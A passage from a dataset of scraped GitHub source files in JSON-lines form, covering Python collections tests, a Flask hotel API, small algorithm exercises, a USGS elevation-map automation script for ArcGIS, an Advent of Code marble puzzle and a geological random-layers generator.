WithSet('cdef') # This used to fail\n self.assertEqual(set(s), set('cd'))\n\n def test_issue_4920(self):\n # MutableSet.pop() method did not work\n class MySet(collections.MutableSet):\n __slots__=['__s']\n def __init__(self,items=None):\n if items is None:\n items=[]\n self.__s=set(items)\n def __contains__(self,v):\n return v in self.__s\n def __iter__(self):\n return 
iter(self.__s)\n def __len__(self):\n return len(self.__s)\n def add(self,v):\n result=v not in self.__s\n self.__s.add(v)\n return result\n def discard(self,v):\n result=v in self.__s\n self.__s.discard(v)\n return result\n def __repr__(self):\n return \"MySet(%s)\" % repr(list(self))\n s = MySet([5,43,2,1])\n self.assertEqual(s.pop(), 1)\n\n def test_Mapping(self):\n for sample in [dict]:\n self.failUnless(isinstance(sample(), Mapping))\n self.failUnless(issubclass(sample, Mapping))\n self.validate_abstract_methods(Mapping, '__contains__', '__iter__', '__len__',\n '__getitem__')\n\n def test_MutableMapping(self):\n for sample in [dict]:\n self.failUnless(isinstance(sample(), MutableMapping))\n self.failUnless(issubclass(sample, MutableMapping))\n self.validate_abstract_methods(MutableMapping, '__contains__', '__iter__', '__len__',\n '__getitem__', '__setitem__', '__delitem__')\n\n def test_Sequence(self):\n for sample in [tuple, list, str]:\n self.failUnless(isinstance(sample(), Sequence))\n self.failUnless(issubclass(sample, Sequence))\n self.failUnless(issubclass(basestring, Sequence))\n self.failUnless(isinstance(range(10), Sequence))\n self.failUnless(issubclass(xrange, Sequence))\n self.failUnless(issubclass(str, Sequence))\n self.validate_abstract_methods(Sequence, '__contains__', '__iter__', '__len__',\n '__getitem__')\n\n def test_MutableSequence(self):\n for sample in [tuple, str]:\n self.failIf(isinstance(sample(), MutableSequence))\n self.failIf(issubclass(sample, MutableSequence))\n for sample in [list]:\n self.failUnless(isinstance(sample(), MutableSequence))\n self.failUnless(issubclass(sample, MutableSequence))\n self.failIf(issubclass(basestring, MutableSequence))\n self.validate_abstract_methods(MutableSequence, '__contains__', '__iter__',\n '__len__', '__getitem__', '__setitem__', '__delitem__', 'insert')\n\nimport doctest, collections\n\ndef test_main(verbose=None):\n NamedTupleDocs = doctest.DocTestSuite(module=collections)\n test_classes = [TestNamedTuple, NamedTupleDocs, TestOneTrickPonyABCs, TestCollectionABCs]\n test_support.run_unittest(*test_classes)\n test_support.run_doctest(collections, verbose)\n\nif __name__ == \"__main__\":\n test_main(verbose=True)\n","repo_name":"damonkohler/sl4a","sub_path":"python/src/Lib/test/test_collections.py","file_name":"test_collections.py","file_ext":"py","file_size_in_byte":18805,"program_lang":"python","lang":"en","doc_type":"code","stars":2372,"dataset":"github-code","pt":"77"} +{"seq_id":"42715940365","text":"from flask import Flask, jsonify\nfrom flask_restful import Api\nfrom app.resources.v1.hotel import Hotels, Hotel\nfrom app.resources.v2.hotel import Hotels as hotels_v2, Hotel as hotel_v2\nfrom app.resources.v2.user import Users, User, Login, Logout, RefreshToken\nfrom flask_jwt_extended import JWTManager\nfrom blacklist import BLACKLIST\n\n\napp = Flask(__name__)\napp.config.from_object('config')\njwt = JWTManager(app)\napi = Api(app)\n\n# v1 resources\napi.add_resource(Hotels, '/v1/hotels/')\napi.add_resource(Hotel, '/v1/hotels/')\n\n# v2 resources\napi.add_resource(hotels_v2, '/v2/hotels/', endpoint='hotels_v2')\napi.add_resource(hotel_v2, '/v2/hotels/', endpoint='hotel_v2')\n\napi.add_resource(Users, '/v2/users/')\napi.add_resource(User, '/v2/users/', endpoint=\"user_id\")\napi.add_resource(Login, '/v2/login/')\napi.add_resource(Logout, '/v2/logout/')\napi.add_resource(RefreshToken, '/v2/refresh/')\n\n\n@app.before_first_request\ndef create_database():\n db.create_all()\n\n\n@jwt.token_in_blacklist_loader\ndef 
check_if_token_in_blacklist(token):\n return token['jti'] in BLACKLIST\n\n\n@jwt.revoked_token_loader\ndef token_access_invalid():\n return jsonify({'message': 'Token has been revoked'}), 401\n\n\n@app.route('/healthcheck/', methods=['GET'])\ndef healthcheck():\n return 'OK'\n\n\nif __name__ == '__main__':\n from database import db\n db.init_app(app)\n app.run(host='0.0.0.0')\n","repo_name":"brunoMirand/hotels_api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"39832330303","text":"'''\nthis problem can be solved by two pointer approach----O(n)\n'''\ndef isalphanum(ch):\n if ord('A')<=ord(ch)<=ord('Z') or ord('a')<=ord(ch)<=ord('z') or ord('0')<=ord(ch)<=ord('9'):\n return True\n else:\n return False\n\ndef isPalindrome(s):\n i=0\n j=len(s)-1\n while i 0 :\n url = back_stack.pop()\n back_stack.append(back_puffer)\n path = os.path.join(dir_name, url.strip(\".com\").strip(\".org\").strip(\"www.\"))\n check_if_exists(path, url)\n try:\n text = get_page(url)\n with open(path, \"w\") as ufile:\n for tag in text:\n ufile.write(tag.get_text())\n back_puffer = url\n except KeyError:\n print(\"Error 404: URL not found\")\n continue\n\nbrowser()\n\n","repo_name":"arercon/Text-Based-Browser","sub_path":"browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7574017147","text":"import sys\r\nfrom heapq import heappush,heappop\r\ninput = sys.stdin.readline\r\n\r\nn = int(input())\r\n\r\nh = []\r\n# 길이가 n 짜리 힙\r\n# -5000 ~ 5000 까지넣을떄 언제 빼고 언제 넣어야해\r\n# 길이가 100짜리라면 제일 작은애보다 크다면 넣어야지\r\nfor _ in range(n):\r\n items = list(map(int,input().split()))\r\n for item in items :\r\n\r\n if (h and h[0] < item) or not h:\r\n heappush(h,item)\r\n #길이가 n 넘어가면 뺴\r\n if len(h) > n :\r\n heappop(h)\r\n\r\nprint(h[0])\r\n","repo_name":"wjs2063/BaekJoon","sub_path":"백준/Silver/2075. N번째 큰 수/N번째 큰 수.py","file_name":"N번째 큰 수.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"45299064034","text":"#unlike any other languages, python has no concept of private of protected variables\n#java would only have the functions play and cards available to users, the rest would be hidden\n\n#creatng a function with _function_name, i.e. an underscore in front, makes it a protected function\n#which can still be accessed when the corresponding filename is imported, but gives you a warning.\n#if object has _ in front of it, its a warning that it shouldnt b meddled with\n\n#prints out all the __functions__\n# g = sorted(globals())\n#\n# for x in globals():\n# print(x)\n\n##recursion\n\n# def fact(n):\n# \"\"\"calculate n iteratively\"\"\"\n# result = 1\n# if n > 1:\n# for f in range(2, n+1):\n# result *= f\n# return result\n\n\ndef factorial(n):\n # n can also be defined as n*(n-1)!\n\n if n <= 1:\n return 1\n else:\n return n * factorial(n-1)\n\ndef fib(n):\n \"\"\"f(n) = f(n-1) + f(n-2)\"\"\"\n if n < 2:\n return n\n else: return fib(n-1) + fib(n-2)\n\n\n\n\n#runs slowly with high fib numbers. 
so try iteratively\n\ndef fibonacci(n):\n if n ==0 :\n result = 0\n elif n ==1:\n result = 1\n else:\n n_minus1 = 1\n n_minus2 = 0\n for f in range(1, n):\n result = n_minus2 + n_minus1\n n_minus2 = n_minus1\n n_minus1 = result\n return result\n\nfor i in range(35):\n print(i, fibonacci(i))\n\n\n\n\n","repo_name":"micullen/learn","sub_path":"PythonCourse/ModulesFunctions/Import.py","file_name":"Import.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18276919253","text":"from socket import *\ns = socket()\ns.bind((\"localhost\", 9999))\ns.listen(3)\nwhile True:\n c, address = s.accept()\n print(\"Connected to \", address)\n c.send(bytes(\"Server welcomes you\", \"utf-8\"))\n\n c.close()\n","repo_name":"kn123g/Learnings","sub_path":"python/Socket_ServerClient/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39757050769","text":"\nclass StockSpanner:\n\n def __init__(self):\n self.array = []\n\n def next(self, price: int) -> int:\n stack = self.array\n span = 1\n quote = price\n while stack and stack[-1][0] <= quote:\n prevQuote,prevSpan = stack.pop()\n span += prevSpan\n self.array.append((quote,span))\n return span\n\n# We have to get the amount of days the newest quote has spanned\n# were a span is the consective days that the quote is less than or equal\n# to the current quote.\n# Each loop checks if the quote is bigger than the one ontop of the stack\n# This condenses the stack to store the numbers that bigger than the\n# previous entries and how many it has spanned.\n# If a smaller number gets added, it means the span has broke and it is added\n# to the top of the stack.\n# O(n), O(1) space\nS = StockSpanner()\nS.next(100)\nS.next(80)\nS.next(60)\nS.next(70)\nS.next(60)\nS.next(75)\nS.next(85)\n# output = [null,1,1,1,2,1,4,6]\n","repo_name":"patchangg/LeetCode","sub_path":"Python/Medium/901.py","file_name":"901.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"48117347496","text":"\"\"\"\nExample taken from http://matplotlib.org/1.5.0/examples/showcase/xkcd.html\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nwith plt.xkcd():\n # Based on \"The Data So Far\" from XKCD by Randall Monroe\n # http://xkcd.com/373/\n\n index = [0, 1]\n data = [0, 100]\n labels = ['CONFIRMED BY EXPERIMENT', 'REFUTED BY EXPERIMENT']\n\n fig = plt.figure()\n ax = fig.add_axes((0.1, 0.2, 0.8, 0.7))\n ax.bar(index, data, 0.25)\n ax.spines['right'].set_color('none')\n ax.spines['top'].set_color('none')\n ax.xaxis.set_ticks_position('bottom')\n ax.set_xticks([0, 1])\n ax.set_xlim([-0.5, 1.5])\n ax.set_ylim([0, 110])\n ax.set_xticklabels(labels)\n plt.yticks([])\n\n plt.title(\"CLAIMS OF SUPERNATURAL POWERS\")\n\n fig.text(\n 0.5, 0.05,\n '\"The Data So Far\" from xkcd by Randall Monroe',\n ha='center')\n\nplt.show()\n","repo_name":"apdavison/space-station-transylvania","sub_path":"xkcd.py","file_name":"xkcd.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28855102046","text":"import time\r\nimport os\r\nimport urllib.request\r\nimport visuals\r\nimport arcpy\r\nimport sys\r\nfrom colorama import init, Fore, Back, 
Style\r\ninit(convert=True)\r\n\r\n#This script is used as an alterative to the \"USGS_DEM_Manipulation_App\", located in this same folder. Instead of choosing steps manually, this script automates all steps in the following order:\r\n# 1) Downloads MED Files(variable named \"regions\" below) from USGS \r\n# 2) Converts the TIF files into the specified geodatabase below (variable named \"gdb\")\r\n# 3) Creates a Hillshade file for each MED\r\n# 4) Creates two datasets for the mosiacs(one for the elevation data and one for the hillshade)\r\n# 5) Creates the two mosiacs using all specified regions below (one for elevation data and one for hillshade)\r\n# 6) Sets symbology properies for both layers to create a visually pleasing map showing two out three components for a 'Swiss Hillshade Map'\r\n\r\n\r\n#elevation layer color ramp style\r\nel_color = \"Elevation #1\"\r\n\r\n#hillshade layer color ramp style\r\nhill_color = \"Black to White\"\r\n\r\n#Project locaiton - end with front slash\r\np_root = \"Z:/ArcGIS_Modules/Automated_Map/\"\r\n\r\n#downloaded files locations\r\nf_root = \"Z:/ArcGIS_Modules/Automated_Map/files/\"\r\n\r\n#working GDB name\r\ngdb = \"Automated_Map\"\r\n\r\n#working regions - Must be in following format: 'nXXwXXX' Example 1: 'n21w089' - visit http://prd-tnm.s3.amazonaws.com/StagedProducts/Elevation/1/TIFF/ to see what regions you require.\r\n#regions = ['n29w082']\r\n\r\n#Florida\r\nregions = ['n25w081','n25w082','n25w083','n26w081','n26w082','n27w081','n27w082','n27w083','n28w081','n28w082','n28w083','n29w082','n29w081','n29w083','n30w081','n30w082','n30w083','n30w084','n30w085','n30w086','n31w082','n31w083','n31w084','n31w085','n31w086','n31w087','n31w088','n32w082','n32w083','n32w084','n32w085','n32w086','n32w087','n32w088']\r\n\r\n#active project\r\np = arcpy.mp.ArcGISProject(r\"Z:/ArcGIS_Modules/Automated_Map/Automated_Map.aprx\")\r\n\r\n#active map\r\nm = p.listMaps(\"Map\")[0]\r\n\r\n#active workspace\r\nenv = arcpy.env.workspace = p_root\r\n\r\n\r\n#downloads the files from the USGS website based on the regions specified.\r\ndef downloadFile(regions,p_root):\r\n\tvisuals.opt_bar(title=\"Starting to download files\",length=5,char=\".\",speed=1,clr_scn=0)\r\n\tfor region in regions:\r\n\t\turl = \"http://prd-tnm.s3.amazonaws.com/StagedProducts/Elevation/1/TIFF/\" + region + \"/USGS_1_\" + region + \".tif\"\r\n\t\tfile_name = p_root + \"data/USGS_1_\" + region + \".tif\"\r\n\t\ttry:\r\n\t\t\tprint(f\"{C.Y}starting to download \" + region + f\"{C.E}\")\r\n\t\t\trequest = urllib.request.urlretrieve(url, file_name)\r\n\t\t\tprint(str(request))\r\n\t\t\tprint(f\"{C.G}\" + region + f\" download complete!{C.E}\")\r\n\t\texcept NameError as e:\r\n\t\t\tprint(e)\r\n\t\t\tinput(f\"{C.R}There was an error downloading your file. 
Please try again.{C.E}\")\r\n\t\t\t\r\n\t\t\t\r\n\tprint(f\"\\n{C.G}Downloads completed!{C.E}\\n\")\r\n\r\n\r\n#adds the raster files to the geodatabase.\r\ndef addRaster2GDB(regions,gdb):\r\n\tvisuals.opt_bar(title=\"Starting to convert files to geodatabase\",length=5,char=\".\",speed=1,clr_scn=0)\r\n\tfor region in regions:\r\n\t\ttry:\r\n\t\t\tarcpy.RasterToGeodatabase_conversion(\"data/USGS_1_\" + region + \".tif\", gdb + \".gdb\", \"\")\r\n\t\t\tprint(f\"\\n{C.G}All rasters converted to geodatabase{C.E}\\n\")\r\n\t\texcept NameError as e:\r\n\t\t\tprint(e)\r\n\t\t\tinput(f\"{C.R}There was an error converting files to geodatabase.{C.E}\")\r\n\t\t\tsys.exit()\r\n\r\n\r\n\r\n#Creates new datasets to house the mosaic data.\r\ndef createDataset(regions,p_root,p,gdb,mp):\r\n\tvisuals.opt_bar(title=\"Starting to create datasets\",length=5,char=\".\",speed=1,clr_scn=0)\r\n\tstr_EL_regions = \"\"\r\n\tstr_HS_regions = \"\"\r\n\ttry:\r\n\t\tarcpy.management.CreateRasterDataset(p_root + gdb + \".gdb\",\"Auto_El_Dataset\")\r\n\t\tarcpy.management.CreateRasterDataset(p_root + gdb + \".gdb\",\"Auto_Hill_Dataset\")\r\n\t\tmp.addDataFromPath(str(p_root + gdb + \".gdb/Auto_Hill_Dataset\"))\r\n\t\tmp.addDataFromPath(str(p_root + gdb + \".gdb/Auto_El_Dataset\"))\r\n\t\tp.save()\r\n\t\tprint(f\"\\n{C.G}Datasets have been created.{C.E}\\n\")\r\n\texcept NameError as e:\r\n\t\tprint(e)\r\n\t\tinput(f\"{C.R}There was an error creating datasets.{C.E}\")\r\n\t\tsys.exit()\r\n\t\r\n\t\r\n\tvisuals.opt_bar(title=\"Starting to create mosaic datasets\",length=5,char=\".\",speed=1,clr_scn=0)\r\n\ttry:\r\n\t\tstr_EL_regions = pushRegionsToStrings(regions,\"USGS_1_\",gdb)\r\n\t\tstr_HS_regions = pushRegionsToStrings(regions,\"HS_\",gdb)\r\n\t\tarcpy.management.Mosaic(str_HS_regions,gdb + \".gdb/Auto_Hill_Dataset\")\r\n\t\tarcpy.management.Mosaic(str_EL_regions,gdb + \".gdb/Auto_El_Dataset\")\r\n\t\tp.save()\r\n\t\tprint(f\"\\n{C.G}Mosaics have been created.{C.E}\\n\")\r\n\texcept NameError as e:\r\n\t\tprint(e)\r\n\t\tinput(f\"{C.R}There was an error creating mosaics.{C.E}\")\r\n\t\tsys.exit()\r\n\t\r\n\r\ndef addFocalStats(p_root,gdb):\r\n\tvisuals.opt_bar(title=\"Starting to add Focal Statistics\",length=5,char=\".\",speed=1,clr_scn=0)\r\n\ttry:\r\n\t\tarcpy.sa.FocalStatistics(p_root + gdb + \".gdb/Auto_El_Dataset\")\r\n\t\tarcpy.sa.FocalStatistics(p_root + gdb + \".gdb/Auto_Hill_Dataset\")\r\n\t\tp.save()\r\n\t\tprint(f\"\\n{C.G}Focal Stats has been added.{C.E}\\n\")\r\n\texcept NameError as e:\r\n\t\tprint(e)\r\n\t\tinput(f\"{C.R}There was an error creating applying Focal Stats.{C.E}\")\r\n\t\tsys.exit()\r\n\r\n\r\n#Takes the region list and formats it for use in the Mosaic toolset\r\ndef pushRegionsToStrings(regions,var,gdb):\r\n\tstr_regions = \"\"\r\n\tfor region in regions:\r\n\t\tstr_regions += gdb + \".gdb/\" + var + region + \";\"\r\n\tstr_regions = str_regions.rstrip(str_regions[-1])\r\n\treturn str_regions\r\n\r\n\r\n#sets the symbology for the layers.\r\ndef addSymbologyToMap(mp,regions,p,p_root,gdb):\r\n\tvisuals.opt_bar(title=\"Starting to apply symbology to elevation dataset\",length=5,char=\".\",speed=1,clr_scn=0)\r\n\tcr = p.listColorRamps(el_color)[0]\r\n\tcr_h = p.listColorRamps(hill_color)[0]\r\n\r\n\t#Sets the elevation layer symbology\r\n\ttry:\r\n\t\tl = mp.listLayers(\"Auto_El_Dataset\")[0]\r\n\t\tsym = l.symbology\r\n\t\tsym.updateColorizer(\"RasterStretchColorizer\")\r\n\t\tsym.colorizer.colorRamp = cr\r\n\t\tsym.colorizer.classificationMethod = 
\"Naturalsys.exit()s\"\r\n\t\tsym.colorizer.breakCount = 18\r\n\t\tl.symbology = sym\r\n\t\tl.transparency = 40\r\n\t\tp.save()\r\n\t\tprint(f\"\\n{C.G}Elevation data symbology added successfully.{C.E}\\n\")\r\n\texcept NameError as e:\r\n\t\tprint(e)\r\n\t\tinput(f\"{C.R}There was an error applying symbology to elevation layers{C.E}\")\r\n\t\r\n\t\r\n\t#Sets the hillside symbology\r\n\tvisuals.opt_bar(title=\"Starting to apply symbology to hillshade dataset\",length=5,char=\".\",speed=1,clr_scn=0)\r\n\ttry:\r\n\t\tl = mp.listLayers(\"Auto_Hill_Dataset\")[0]\r\n\t\tsym = l.symbology\r\n\t\tsym.updateColorizer(\"RasterStretchColorizer\")\r\n\t\tsym.colorizer.colorRamp = cr_h\r\n\t\tl.symbology = sym\r\n\t\tp.save()\r\n\t\tprint(f\"\\n{C.G}Hillside data symbology added successfully.{C.E}\\n\")\r\n\texcept NameError as e:\r\n\t\tprint(e)\r\n\t\tprint(f\"{C.R}There was an error applying symbology to hillshade layer.{C.E}\")\r\n\t\r\n\r\n#creates hillshade files out of the tif's and then coverts them into the geodatabase.\r\ndef layerToHillshade(regions,p_root,gdb,mp,p):\r\n\tvisuals.opt_bar(title=\"Starting to create hillshade files\",length=5,char=\".\",speed=1,clr_scn=0)\r\n\tfor region in regions:\r\n\t\ttry:\r\n\t\t\toutHillshade = arcpy.sa.Hillshade(p_root + gdb + \".gdb/USGS_1_\" + region)\r\n\t\t\toutHillshade.save(p_root + \"output/HS_\" + region)\r\n\t\t\tarcpy.RasterToGeodatabase_conversion(\"output/HS_\" + region,gdb + \".gdb\", \"\")\r\n\t\t\tprint(f\"\\n{C.G}Hillshades created successfully.{C.E}\")\r\n\t\texcept NameError as e:\r\n\t\t\tprint(e)\r\n\t\t\tinput(f\"{C.R}There was an error creating hillshade files.{C.E}\")\r\n\t\t\tsys.exit()\r\n\t\r\n\r\ndef goodbye():\r\n\tinput(\"All modules have ran successfully, press any key to close.\")\r\n\r\n\r\n#color class for visual purposes.\r\nclass C:\r\n H = '\\033[95m'\r\n B = '\\033[94m'\r\n C = '\\033[96m'\r\n G = '\\033[92m'\r\n Y = '\\033[93m'\r\n R = '\\033[91m'\r\n E = '\\033[0m'\r\n BOLD = '\\033[1m'\r\n UNDERLINE = '\\033[4m'\r\n\r\n\r\n#Run the script:\r\n\r\n#Download the files from USGS.\r\ndownloadFile(regions,p_root)\r\n\r\n#Add downloaded DEM files to a gdb\r\naddRaster2GDB(regions,gdb)\r\n\r\n#Create Hillshade files out of the DEM files from gdb\r\nlayerToHillshade(regions,p_root,gdb,p,m)\r\n\r\n#Create the datasets to join files together and turn all tiles into a mosaic\r\ncreateDataset(regions,p_root,p,gdb,m)\r\n\r\n#smooths out the cells in the elevation data since maps from USGS can be a bit choppy\r\naddFocalStats(p_root,gdb)\r\n\r\n#Add the symbology to the dataset layers\r\naddSymbologyToMap(m,regions,p,p_root,gdb)\r\n\r\n#closes program\r\ngoodbye()\r\n","repo_name":"ScriptChicken/USGS_Automation_Script","sub_path":"USGS_to_Swiss_Hillshade_Script.py","file_name":"USGS_to_Swiss_Hillshade_Script.py","file_ext":"py","file_size_in_byte":8299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33551279901","text":"\nclass Node:\n def __init__(self, dataval=None):\n self.dataval = dataval\n self.nextval = self\n self.prevval = self\n\nclass LinkedList:\n \n def __init__(self):\n self.headval = Node(0)\n self.currNode = self.headval\n\n# Function to add node\n def add(self,newdata):\n\n NewNode = Node(newdata)\n node = self.currNode.prevval\n \n node.nextval.prevval = NewNode\n NewNode.nextval = node.nextval\n NewNode.prevval = node\n node.nextval = NewNode\n \n self.currNode = NewNode\n \n def forward(self, steps):\n for x in range(steps):\n self.currNode = 
self.currNode.nextval\n\n def backward(self, steps):\n for x in range(steps):\n self.currNode = self.currNode.prevval\n\n def removeCurrent(self):\n value = self.currNode.dataval\n\n self.currNode.prevval.nextval = self.currNode.nextval\n self.currNode.nextval.prevval = self.currNode.prevval\n self.currNode = self.currNode.nextval\n \n return value\n \n# Print the linked list\n def listprint(self):\n val = str(self.headval.dataval)+\", \"\n start = self.headval\n printval = self.headval.nextval\n first = True\n while printval is not start:\n val += str(printval.dataval)+\", \"\n printval = printval.nextval\n return val\n \n#puzzle input: 430 players; last marble is worth 71588 points\ndemoInput = False\n\nif demoInput:\n players = 13\n marbles = 7999\nelse:\n players = 430\n marbles = 7158800\n\ncurrentMarble = 0\nboard = LinkedList()\nnewMarblePos = 2\nscoringMarble = 23\n\nscores = {}\n\nfor marble in range(1, marbles+1):\n player = ((marble-1)%players)+1\n\n if marble % 100000 == 0:\n print (\"Current marble:\",marble)\n if marble > 1 and marble % scoringMarble == 0:\n turnScore = marble + scores.setdefault(player, 0)\n board.backward(7)\n removedMarble = board.removeCurrent()\n scores[player] = turnScore + removedMarble\n #print (\"*[\",player,\"]\",board.listprint(), \"; scored\",scores[player])\n continue\n\n board.forward(2)\n board.add(marble)\n #print (\"[\",player,\"]\",board.listprint())\n\ntally = sorted([x for x in scores.items()], key=lambda a : a[1], reverse=True)\nprint(tally[0])\n","repo_name":"zac112/adventOfCode","sub_path":"code2018/py3/day9/day9_2.py","file_name":"day9_2.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"36136945487","text":"primary_1pair = int(input())\nprimary_2pair = int(input())\ndiff1 = int(input())\ndiff2 = int(input())\n\nfor a in range(primary_1pair, primary_1pair + diff1 + 1):\n for b in range(primary_2pair, primary_2pair + diff2 + 1):\n first_is_prime = True\n second_is_prime = True\n for c in range(2, a):\n if a % c == 0:\n first_is_prime = False\n break\n for d in range(2, b):\n if b % d == 0:\n second_is_prime = False\n break\n if first_is_prime and second_is_prime:\n print(f\"{a}{b}\")\n","repo_name":"yordanraychev/software-university-python","sub_path":"01_programming_basics_with_python/06_nested_loops_more_exercises/13_prime_pairs.py","file_name":"13_prime_pairs.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27685807572","text":"# https://www.hackerrank.com/challenges/ctci-ransom-note\n\ndef ransom_note(magazine, ransom):\n noteDict = dict()\n for word in magazine:\n if word in noteDict.keys():\n noteDict[word] += 1\n else:\n noteDict[word] = 1\n for word in ransom:\n if not(word in noteDict.keys()):\n return False\n else:\n noteDict[word] -= 1\n if noteDict[word] < 0:\n return False\n return True\n\nm, n = map(int, input().strip().split(' '))\nmagazine = input().strip().split(' ')\nransom = input().strip().split(' ')\nif m < n:\n print(\"No\")\nelse:\n answer = ransom_note(magazine, ransom)\n if(answer):\n print(\"Yes\")\n else:\n print(\"No\")\n \n","repo_name":"Tsunamicom/Hackerrank-Solutions","sub_path":"HashTablesRansomNote.py","file_name":"HashTablesRansomNote.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} 
+{"seq_id":"36642794608","text":"\nimport argparse\nfrom wgsa_add.utils import *\nfrom wgsa_add.base import load_json\nfrom os import path as ospath\n\ncol_names = [\"genes\",\n \"assay\",\n \"enhancer\",\n \"GO_molecular_function_complete_list_id\",\n \"GO_biological_process_complete_list_id\",\n \"GO_cellular_component_complete_list_id\",\n \"PANTHER_GO_SLIM_molecular_function_list_id\",\n \"PANTHER_GO_SLIM_biological_process_list_id\",\n \"PANTHER_GO_SLIM_cellular_component_list_id\",\n \"REACTOME_pathway_list_id\",\n \"PANTHER_pathway_list_id\"]\n\n\ndef main():\n parser = parse_arguments()\n enhancer_dir = parser.enhancer_dir\n vcf_path = parser.vcf_path\n\n annotation_file = ospath.splitext(ospath.basename(vcf_path))[0]\n annotation = load_json(ospath.join(enhancer_dir, annotation_file+'.json'))\n\n add_annotation(vcf_path, annotation)\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('-e', '--enhancer_dir', dest='enhancer_dir', required=True,\n help='Panther Dir (panther_data, cor_data and annoq_tree)')\n parser.add_argument('-f', '--vcf_path', dest='vcf_path', required=True,\n help='VCF file')\n\n return parser.parse_args()\n\n\ndef in_region(pos, start, end):\n return pos >= start and pos <= end\n\n\ndef combine_interval_data_into_r(annotations, coor, col_names):\n chrom, pos = coor[0], coor[1]\n panther_annotations = [annotation for annotation in annotations if \n in_region(pos, annotation['start'], annotation['end'])]\n result = {}\n for annotation in panther_annotations:\n for col_name in annotation['data']:\n result[col_name] = result.get(col_name, set()).union(annotation['data'][col_name])\n for col_name in col_names:\n if not result.get(col_name):\n result[col_name] = '.'\n\n return [';'.join(result[col_name]) for col_name in col_names]\n\n\ndef add_annotation_header():\n add_cols = ['enhancer_linked_' + i for i in col_names]\n\n return add_cols\n\n\ndef add_annotation_row(row, annotations):\n line = row.rstrip().split(\"\\t\")\n chrom, pos = line[0], int(line[1])\n coor = [chrom, pos]\n add_cols = combine_interval_data_into_r(\n annotations, coor, col_names)\n\n return add_cols\n\n\ndef add_annotation(filepath, annotations):\n\n with open(filepath) as fp:\n row = fp.readline().rstrip()\n add_cols = add_annotation_header()\n print(add_record(row, add_cols))\n\n # add info\n while row:\n row = fp.readline().rstrip()\n if row:\n add_cols = add_annotation_row(row, annotations)\n print(add_record(row, add_cols))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"USCbiostats/annoq-data-builder","sub_path":"wgsa_add/add_enhancer_anno.py","file_name":"add_enhancer_anno.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42584520410","text":"import os\nimport numpy as np\n\n# RandomLayers package\nfrom RandomLayers.random_fields import RandomFields\nfrom RandomLayers.methods import ModelName\nfrom RandomLayers.mesh import LayersMesh\nfrom RandomLayers.utils import slice, split_data\n\n\n\ndef generate_data(x_max, y_max, z_max, nb_max_layers, min_layer_thickness,\n planes_dict, soils_dict, output_folder, nb_realisations, min_value=1):\n\n if not os.path.exists(output_folder):\n os.makedirs(output_folder)\n\n\n for n in range(nb_realisations):\n try:\n print(f\"Number of realisation: {n}\")\n np.random.seed(n)\n\n nb_layers = np.random.randint(1, nb_max_layers + 1)\n idx_to_use_soil = np.random.choice(range(nb_layers), nb_layers, 
replace=False)\n # print(f\"Number of layers: {nb_layers}\")\n\n z_middle = []\n z_low = 0\n for i in range(nb_layers - 1):\n new_z = np.round(np.random.uniform(z_low, z_max), 1)\n if new_z == z_max:\n break\n z_middle.append(new_z)\n z_low = z_middle[i] + min_layer_thickness\n if z_low >= z_max:\n break\n\n nb_layers = int(len(z_middle) + 1)\n idx_to_use_soil = idx_to_use_soil[:nb_layers]\n # print(f\"Number of layers: {nb_layers}\")\n\n planes = []\n plane_cov = []\n theta = []\n aniso = []\n angles = []\n planes.append(np.array([[0, 0, 0],\n [x_max, 0, 0],\n [x_max, y_max, 0],\n [0, y_max, 0],\n ])\n )\n plane_cov.append([0, 0, 0])\n\n for z in z_middle:\n planes.append(np.array([[0, 0, z],\n [x_max, 0, z],\n [x_max, y_max, z],\n [0, y_max, z],\n ])\n )\n _cov = np.round(np.random.uniform(0, planes_dict[\"max_cov\"]), 3)\n _theta = np.round(np.random.uniform(0, planes_dict[\"max_theta\"]), 3)\n plane_cov.append([0, 0, _cov])\n theta.append([_theta, _theta, _theta])\n aniso.append([1, 1, 1])\n angles.append([0, 0, 0])\n\n\n planes.append(np.array([[0, 0, z_max],\n [x_max, 0, z_max],\n [x_max, y_max, z_max],\n [0, y_max, z_max],\n ])\n )\n plane_cov.append([0, 0, 0])\n theta.append([1, 1, 1])\n aniso.append([1, 1, 1])\n angles.append([0, 0, 0])\n\n resample_points_x = 51\n resample_points_y = 6\n resample_points_z = 21\n\n layers = LayersMesh(planes, plane_cov,\n model=ModelName.Gaussian, theta=theta, anisotropy=aniso, angles=angles, resample_points=51, seed=n)\n\n x = np.linspace(0, x_max, resample_points_x)\n y = np.linspace(0, y_max, resample_points_y)\n z = np.linspace(0, z_max, resample_points_z)\n X, Y, Z = np.meshgrid(x, y, z, indexing=\"ij\")\n\n 